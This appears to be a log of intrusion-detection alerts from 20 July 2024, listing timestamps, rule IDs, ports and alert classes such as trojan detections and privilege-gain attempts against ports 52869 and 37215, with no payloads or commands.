                      Timestamp:07/20/24-23:01:42.687128
                      SID:2831300
                      Source Port:38200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:54.367854
                      SID:2027339
                      Source Port:41138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650871
                      SID:2829579
                      Source Port:52136
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.716646
                      SID:2027339
                      Source Port:46338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.775798
                      SID:2027339
                      Source Port:51568
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.974605
                      SID:2831300
                      Source Port:53306
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.549051
                      SID:2027339
                      Source Port:50696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.263057
                      SID:2027339
                      Source Port:59984
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.699598
                      SID:2027339
                      Source Port:43810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.704267
                      SID:2027339
                      Source Port:44400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.157444
                      SID:2835222
                      Source Port:52632
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.957555
                      SID:2027339
                      Source Port:41402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.405053
                      SID:2831300
                      Source Port:49608
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.033190
                      SID:2027339
                      Source Port:45472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.116386
                      SID:2025132
                      Source Port:47788
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.048825
                      SID:2829579
                      Source Port:56284
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.463055
                      SID:2027339
                      Source Port:42220
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.001369
                      SID:2025132
                      Source Port:45394
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.440143
                      SID:2025132
                      Source Port:55764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.285038
                      SID:2829579
                      Source Port:46210
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.624541
                      SID:2027339
                      Source Port:48202
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.181938
                      SID:2829579
                      Source Port:36886
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.409097
                      SID:2025132
                      Source Port:52916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.641942
                      SID:2027339
                      Source Port:46344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.743446
                      SID:2831300
                      Source Port:56730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.014738
                      SID:2027339
                      Source Port:44048
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.038410
                      SID:2027339
                      Source Port:54114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.144672
                      SID:2835222
                      Source Port:55502
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.901282
                      SID:2027339
                      Source Port:54834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.344252
                      SID:2025132
                      Source Port:37504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:57.795137
                      SID:2025132
                      Source Port:54130
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:54.515977
                      SID:2025132
                      Source Port:55936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:04.640459
                      SID:2831300
                      Source Port:32958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.572197
                      SID:2831300
                      Source Port:55296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.048113
                      SID:2835222
                      Source Port:57456
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.090830
                      SID:2835222
                      Source Port:60644
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.113390
                      SID:2835222
                      Source Port:60610
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.331150
                      SID:2835222
                      Source Port:58004
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.384516
                      SID:2027339
                      Source Port:56926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.030153
                      SID:2027339
                      Source Port:58654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.131340
                      SID:2835222
                      Source Port:53976
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.816521
                      SID:2829579
                      Source Port:52566
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.929013
                      SID:2835222
                      Source Port:44336
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.600679
                      SID:2831300
                      Source Port:45328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:14.105395
                      SID:2835222
                      Source Port:41286
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.639093
                      SID:2835222
                      Source Port:57218
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.930505
                      SID:2027339
                      Source Port:39212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.175900
                      SID:2835222
                      Source Port:36122
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.196993
                      SID:2829579
                      Source Port:59916
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.509396
                      SID:2027339
                      Source Port:53182
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.818830
                      SID:2835222
                      Source Port:36164
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.747994
                      SID:2027339
                      Source Port:48270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:27.457367
                      SID:2027339
                      Source Port:59154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.432937
                      SID:2025132
                      Source Port:58602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.600114
                      SID:2831300
                      Source Port:58992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.814790
                      SID:2027339
                      Source Port:60236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.140632
                      SID:2829579
                      Source Port:33620
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.336908
                      SID:2829579
                      Source Port:49886
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.841280
                      SID:2027339
                      Source Port:43428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.113314
                      SID:2027339
                      Source Port:34652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.387777
                      SID:2027339
                      Source Port:44176
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.603142
                      SID:2027339
                      Source Port:53562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.629050
                      SID:2025132
                      Source Port:37134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.124824
                      SID:2025132
                      Source Port:35310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.377081
                      SID:2027339
                      Source Port:34994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.825670
                      SID:2027339
                      Source Port:36608
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.976649
                      SID:2829579
                      Source Port:36002
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.662837
                      SID:2831300
                      Source Port:42730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.575986
                      SID:2027339
                      Source Port:59784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.817771
                      SID:2835222
                      Source Port:58516
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.007374
                      SID:2025132
                      Source Port:36010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.798104
                      SID:2025132
                      Source Port:52252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:32.060731
                      SID:2829579
                      Source Port:59522
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.912337
                      SID:2025132
                      Source Port:60206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:14.207040
                      SID:2835222
                      Source Port:38408
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.360180
                      SID:2025132
                      Source Port:48112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.704900
                      SID:2027339
                      Source Port:56180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.806839
                      SID:2027339
                      Source Port:35888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.450129
                      SID:2831300
                      Source Port:48682
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.157619
                      SID:2835222
                      Source Port:59652
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.072139
                      SID:2025132
                      Source Port:42710
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.890268
                      SID:2025132
                      Source Port:45790
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:06.990535
                      SID:2835222
                      Source Port:37940
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.813625
                      SID:2027339
                      Source Port:51160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.908066
                      SID:2027339
                      Source Port:37598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.172943
                      SID:2829579
                      Source Port:50406
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.032492
                      SID:2835222
                      Source Port:51940
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.869521
                      SID:2027339
                      Source Port:47750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.062246
                      SID:2025132
                      Source Port:54704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.822392
                      SID:2829579
                      Source Port:41642
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.383579
                      SID:2025132
                      Source Port:43468
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:55.623247
                      SID:2831300
                      Source Port:54538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.677301
                      SID:2025132
                      Source Port:55986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.750140
                      SID:2027339
                      Source Port:60326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:07.401340
                      SID:2027339
                      Source Port:47090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.046626
                      SID:2829579
                      Source Port:54992
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.735607
                      SID:2027339
                      Source Port:50640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.111275
                      SID:2025132
                      Source Port:43974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.221141
                      SID:2835222
                      Source Port:52906
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.159648
                      SID:2027339
                      Source Port:53638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.061779
                      SID:2829579
                      Source Port:59324
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.464382
                      SID:2025132
                      Source Port:60824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:07.018425
                      SID:2835222
                      Source Port:40100
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.425638
                      SID:2027339
                      Source Port:40594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.050672
                      SID:2829579
                      Source Port:39408
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.055714
                      SID:2829579
                      Source Port:36492
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.939519
                      SID:2025132
                      Source Port:50474
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.360543
                      SID:2027339
                      Source Port:54518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.524729
                      SID:2027339
                      Source Port:49608
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.975107
                      SID:2835222
                      Source Port:53832
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.312894
                      SID:2027339
                      Source Port:53344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:10.031806
                      SID:2027339
                      Source Port:49060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.782707
                      SID:2027339
                      Source Port:56436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.113254
                      SID:2829579
                      Source Port:40340
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650037
                      SID:2829579
                      Source Port:48746
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.322217
                      SID:2027339
                      Source Port:39998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.532849
                      SID:2027339
                      Source Port:40410
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.197215
                      SID:2025132
                      Source Port:59982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:59.604768
                      SID:2027339
                      Source Port:48086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.172994
                      SID:2027339
                      Source Port:39872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.723019
                      SID:2027339
                      Source Port:41890
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.588009
                      SID:2831300
                      Source Port:59924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.158920
                      SID:2025132
                      Source Port:52066
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:59.539512
                      SID:2027339
                      Source Port:35924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.321505
                      SID:2027339
                      Source Port:49492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.067695
                      SID:2027339
                      Source Port:50730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:08.128674
                      SID:2025132
                      Source Port:46790
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.118192
                      SID:2027339
                      Source Port:33128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:05.590034
                      SID:2027339
                      Source Port:41408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.245523
                      SID:2025132
                      Source Port:58408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:26.120876
                      SID:2025132
                      Source Port:55384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.138222
                      SID:2027339
                      Source Port:38704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.312311
                      SID:2027339
                      Source Port:39582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.280820
                      SID:2027339
                      Source Port:52686
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.294677
                      SID:2829579
                      Source Port:52602
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.897768
                      SID:2025132
                      Source Port:45198
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.290838
                      SID:2027339
                      Source Port:52896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221365
                      SID:2829579
                      Source Port:32888
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.146169
                      SID:2027339
                      Source Port:54036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.637175
                      SID:2829579
                      Source Port:46764
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.047411
                      SID:2829579
                      Source Port:42784
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.312186
                      SID:2027339
                      Source Port:38986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.270636
                      SID:2027339
                      Source Port:55774
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.328066
                      SID:2027339
                      Source Port:49834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.085493
                      SID:2025132
                      Source Port:48974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.794251
                      SID:2027339
                      Source Port:50094
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221735
                      SID:2829579
                      Source Port:47684
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.118166
                      SID:2829579
                      Source Port:45782
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.599362
                      SID:2831300
                      Source Port:50400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:34.053062
                      SID:2835222
                      Source Port:44258
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.520662
                      SID:2025132
                      Source Port:36958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.722161
                      SID:2025132
                      Source Port:43486
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:25.589558
                      SID:2835222
                      Source Port:54630
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.303669
                      SID:2027339
                      Source Port:41978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.686542
                      SID:2831300
                      Source Port:35262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.975513
                      SID:2835222
                      Source Port:37012
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.620479
                      SID:2025132
                      Source Port:39684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.202477
                      SID:2025132
                      Source Port:52778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.825430
                      SID:2025132
                      Source Port:41712
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:58.885082
                      SID:2831300
                      Source Port:38460
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.660516
                      SID:2027339
                      Source Port:51048
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.057359
                      SID:2831300
                      Source Port:38558
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.500697
                      SID:2027339
                      Source Port:59950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.634900
                      SID:2027339
                      Source Port:55072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.817297
                      SID:2829579
                      Source Port:43468
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.148145
                      SID:2835222
                      Source Port:53440
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.653586
                      SID:2835222
                      Source Port:54258
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.145997
                      SID:2025132
                      Source Port:60476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.094111
                      SID:2027339
                      Source Port:48356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.320095
                      SID:2027339
                      Source Port:34398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.144672
                      SID:2835222
                      Source Port:54608
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.980169
                      SID:2027339
                      Source Port:47834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222009
                      SID:2829579
                      Source Port:36512
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.276434
                      SID:2025132
                      Source Port:54756
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:21.954501
                      SID:2829579
                      Source Port:56588
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.360320
                      SID:2027339
                      Source Port:47796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.569234
                      SID:2027339
                      Source Port:54596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.145997
                      SID:2027339
                      Source Port:34796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.250892
                      SID:2025132
                      Source Port:60948
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:10.711138
                      SID:2027339
                      Source Port:42232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.258596
                      SID:2831300
                      Source Port:36072
                      Destination Port:52869
                      Protocol:TCP
